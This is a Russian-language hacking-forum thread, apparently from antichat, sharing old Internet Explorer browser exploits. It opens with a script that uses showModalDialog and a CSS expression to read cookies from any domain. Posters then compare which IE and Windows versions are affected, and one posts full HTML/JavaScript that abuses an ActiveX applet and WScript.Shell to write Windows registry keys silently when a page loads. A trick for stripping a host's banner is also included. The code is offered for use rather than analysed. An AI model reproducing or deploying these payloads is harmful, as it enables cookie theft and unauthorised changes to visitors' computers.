с помощью этого скрипта можно получить доступ к cookies любого домена Code: <SCRIPT> showModalDialog("http://forum.antichat.ru",null,"font-size:expression(window.execScript(unescape('alert%28%22Domain%3A%22+document.domain+%22%5CnCookie%3A%22+document.cookie%29%3Bwindow.close%28%29%3B')))"); </SCRIPT> взял с секлаба
Да дело не в этом, просто в большинстве броузеров это не сработает ... xp sp2 не пашет, на sp1 думаю тоже ... ИМХО, только на IE ниже 5 версии (или 5, хз) Надо проверить ... хехе, на тебе что не проверяй - все пашет ))
Работает в шестой версии, проверялось на XPSP1, ну и на Win 98) да и вобще такого типа уязвимость от ОС вряд ли зависит. только от версии IE
Тут дело в изменениях в плане безопасности, появившихся во втором сервис паке + некоторые другие факторы, такие как наличие фаервола с фильтрацией интерактивных элементов, наличе, изменения каких-либо настроек (в частности отключение ActiveX ) и т.п. ... Кстати, вот например эксплоит с переполнением буфера через <iframe> работает только на xp или xp sp1. Под 2k или sp2 он просто вешает осла, при этом никакие команды не выполняются. Так что от ОС очень даже зависит ...
Ну почти.. я не то немного имел ввиду. Здесь именно такая уязвимость имхо Вот ДоС или переполнения буфера зависят от ОС, а здесь уже не затрагивается движок проводника, а ошибка чисто в надстройках, поэтому и говорю. Ну если конечно рассматривать что в Sp входят патчи для Ie, то и от неё зависит. короче, ладно))
На 98-м (но с обнавлениями) с шестым ИЕ тоже не работает. Завтра проверю на 98-х без обновлений и пятым ИЕ. ... Если на то пошло (старье поднимаем) - также завтра притащю как при заходе на страницу в 98 (ИЕ5) реестр править. Причем - антивирусы (нортон и касперский) орут что там хрень какая-то, однако пропускают и можно редактировать ветки реестра (ну, или, сносить их).
Для 98-го. Правит реестр (добавляя при загрузке винды приветственную надпись). ... HTML: <HTML><HEAD></HEAD><BODY> <APPLET code=com.ms.activeX.ActiveXComponent height=0 width=0><PARAM NAME="code" VALUE="com.ms.activeX.ActiveXComponent"><PARAM NAME="height" VALUE="1"><PARAM NAME="width" VALUE="1"><PARAM NAME="codeBase" VALUE="http://www.antichat.ru"></APPLET> <SCRIPT language=JAVASCRIPT> <!-- InterfaceObject=document.applets[0]; setTimeout("Run()",1000); function Run() { regkey = "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption" regparam = "Велкам!" WshShellClassID="{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"; InterfaceObject.setCLSID(WshShellClassID); wshShell = InterfaceObject.createInstance(); wshShell.regwrite(regkey,regparam) regkey = "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText" regparam = "Добро пожаловать на Античат | http://www.antichat.ru" wshShell.regwrite(regkey,regparam) } --> </SCRIPT></BODY></HTML><noscript><noscript><plaintext><plaintext> ... p.s. в конце <noscript><noscript><plaintext><plaintext> это для "резки" банера на НАрод_Ру
